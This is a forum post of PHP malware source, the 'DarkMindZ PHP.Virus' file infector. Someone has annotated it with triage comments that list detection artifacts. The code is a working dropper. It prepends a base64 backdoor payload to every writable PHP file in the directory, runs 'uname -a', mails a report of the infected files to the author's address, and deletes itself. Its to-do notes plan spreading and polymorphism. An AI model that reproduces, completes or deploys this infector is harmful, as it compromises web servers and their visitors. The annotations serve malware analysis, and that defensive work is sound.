
14.02.2008, 04:49
PHP код:
<?php // DarkMindZ.com
######################################
# [ DarkMindZ PHP.Virus v1.5 ] #
# [ RoMeO ] #
######################################
# [analysis] Summary for triage: a one-shot PHP dropper/file infector. It walks the
# [analysis] current directory only (no recursion), prepends a base64-decoded payload to
# [analysis] every writable file whose name contains ".php", records the touched paths,
# [analysis] optionally mails a report, and then removes itself. The payload is NOT part
# [analysis] of this listing: $backdoor is an empty string below.
# [analysis] Artifacts visible in this listing that can be hunted for:
# [analysis]   - the marker string 'DarkMindZ.com' (used as the "already infected" test)
# [analysis]   - scratch file '__tmp' and optional log '__log.html' in the web directory
# [analysis]   - outbound mail with subject "DarkMindZ Backdoor" and the From/X-Mailer headers built below
# [analysis]   - the HTML banner and "[x] Infected:" lines echoed into the HTTP response
# [analysis] The next two calls remove the execution time limit and keep the script
# [analysis] running after the requesting client disconnects.
set_time_limit(0);
ignore_user_abort(1);
# root@darkmindz.com~ cat /home/pr0jects/virus/intro
# DMZ PHP.Virus, very simple PHP virus, that would do the following:
# |1| Look for all PHP files in directory.
# |2| Check if infected.
# |3| Infect with your backdoor.
# |4| Log all infected files, and optional mail them to you.
# root@darkmindz.com~ exit
# [ To-Do ] #
# Mass infector, infect other users on server.
# Better Reports, some system info reports too.
# Spreading, by RFI dorks.
# Polymorphism
#[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]
######## [ CONFIG ] ########
# [analysis] $backdoor is empty here, so base64_decode() yields an empty string and the
# [analysis] listing as posted rewrites files without adding content. $agent is only
# [analysis] echoed into the mailed report in this file; the author's comment suggests the
# [analysis] payload keys on it as a user-agent - cannot be confirmed from this listing.
$backdoor =''; # your backdoor here - Base64 encoded PLEASE
$agent = 'darkmindz.com_b4ckd00r'; # your agent here.
##
$log_email = 1; # Send log to email?
$email = 'romeo.haxxor@gmail.com'; # Email to send logs to.
##
$log_report = 0; # Write a log?
$filename = '__log.html'; # name of log.
##
$delete_me = 1; # Delete me after we are done? - Recommended. :]
##
# [analysis] Fixed HTML banner written to the response body; usable as a response-content signature.
echo '<title>DarkMindZ.com - Think Dark - The Backdoor.</title><center><strong> [ <a href="http://www.darkmindz.com">DarkMindZ.com || Mass Backdoor Tool || By RoMeO</a> ]</strong></center><br>';
# [analysis] Scope is the process's current working directory; subdirectories are not visited.
$dir = opendir('.');
# [analysis] Host name comes from the request's Host header; the $HTTP_HOST fallback is a
# [analysis] legacy global that is not assigned anywhere in this file.
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
echo '<strong>[-] Infecting : ' . $site . '</strong><br>';
while ($file = readdir($dir))
{
# [analysis] Candidate test: the name contains the substring '.php' anywhere (not only as
# [analysis] an extension) AND the PHP process can write to it. Files that the web-server
# [analysis] account cannot write are skipped by this condition.
if (strstr($file, '.php') && is_writeable($file))
{
$victim = fopen($file, 'r+');
$victim_read = fread($victim, filesize($file));
# [analysis] Re-infection guard: any file already containing 'DarkMindZ.com' is left alone.
# [analysis] Presumably the real payload carries that string - confirm against a recovered
# [analysis] sample before relying on it as the only content signature.
if (!strstr($victim_read, 'DarkMindZ.com'))
{
fclose($victim);
# [analysis] The original is deleted and a new file is created under the same name with
# [analysis] the decoded payload placed BEFORE the original content. Because the file is
# [analysis] recreated rather than edited in place, each touched file gets a new inode and
# [analysis] a fresh modification time; ownership of the new file presumably becomes the
# [analysis] web-server account - verify per host. File-integrity monitoring and a diff
# [analysis] against version control or backups will show the prepended bytes.
unlink($file);
$new = fopen($file, 'a+');
$new_write = fwrite($new, base64_decode($backdoor) . $victim_read);
fclose($new);
echo '[x] Infected: ' . getcwd() .'/'. $file . '<br>';
# [analysis] Each touched path is appended to '__tmp' (when mailing is enabled) and/or to
# [analysis] $filename ('__log.html'); both are created in the current working directory.
if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() .'/'. $file . '
'); fclose($log); }
if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() .'/'. $file . "\n"); fclose($x); }
}
}
}
closedir($dir);
# [analysis] Reporting stage: builds mail headers by hand, appends host details to the
# [analysis] contents of '__tmp' and sends the result with mail(). Outbound-mail logs on the
# [analysis] host are a place to look for the subject and From values set below.
if($log_email) {
$fromname = "DarkMindZ Backdoor";
$fromaddress = "root@darkmindz.com";
$eol="\n";
$headers = "From: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Reply-To: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Return-Path: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Message-ID: <".time()."-".$fromaddress.">".$eol;
$headers .= "X-Mailer: PHP v".phpversion().$eol;
$headers .= 'MIME-Version: 1.0'.$eol;
$headers .= "Content-type: text/html; charset=iso-8859-1".$eol.$eol;
$report = file_get_contents('__tmp');
# [analysis] $dir is reused here for the working-directory path. $part[1] is the first
# [analysis] path component after the leading '/', which the report labels "Username".
$dir = getcwd();
$part = explode('/', $dir);
$username = $part[1];
# [analysis] Runs an OS command through system(); '@' suppresses PHP errors. system() also
# [analysis] writes the command output to the response. Hosts where system() is listed in
# [analysis] disable_functions will not return a value here.
$uname = @system('uname -a');
$report .= '
###########################################
Backdoor Report | | DarkMindZ.com
###########################################
Target: '.$site.'
Uname: '.$uname.'
Username: '.$username.'
Agent: '.$agent.'
###########################################
';
# [analysis] Sends the report, then deletes the '__tmp' scratch file.
mail($email, "DarkMindZ Backdoor", '
' .$report, $headers); unlink('__tmp'); echo '<br />[x] Email Report Sent!';}
# [analysis] Self-deletion: with $delete_me set, the dropper removes its own file, so it is
# [analysis] likely absent at triage time. The modified PHP files, web access logs for the
# [analysis] request that ran it, and mail logs remain as evidence.
if($delete_me) { unlink(__file__); }
# done, kthxbai! next target pl0x;]
exit; # if we are in a RFI, we dont want to show other content, right?
?>